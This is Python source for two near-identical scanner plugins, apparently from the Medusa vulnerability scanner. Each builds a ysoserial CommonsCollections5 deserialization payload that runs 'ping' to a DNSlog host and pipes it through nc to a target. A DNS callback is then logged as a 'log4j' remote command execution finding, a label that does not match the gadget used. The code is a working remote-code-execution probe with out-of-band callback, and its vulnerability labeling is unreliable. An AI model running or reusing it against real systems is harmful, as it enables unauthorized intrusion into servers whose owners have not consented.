def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: dns = Dnslog() os.system( 'java -jar {} CommonsCollections5 "ping {}" | nc {} {}'.format( Ysoserial().result(), dns.dns_host(), url, port)) if dns.result(): Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n请看DNSlog数据\r\n".format( url, scheme + "://" + url + ":" + str(port)) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write( "Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: dns = Dnslog() os.system( 'java -jar {} CommonsCollections5 "ping {}" | nc {} {}'.format( Ysoserial().result(), dns.dns_host(), url, port)) if dns.result(): Medusa = "{}存在log4j远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n请看DNSlog数据\r\n".format( url, scheme + "://" + url + ":" + str(port)) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名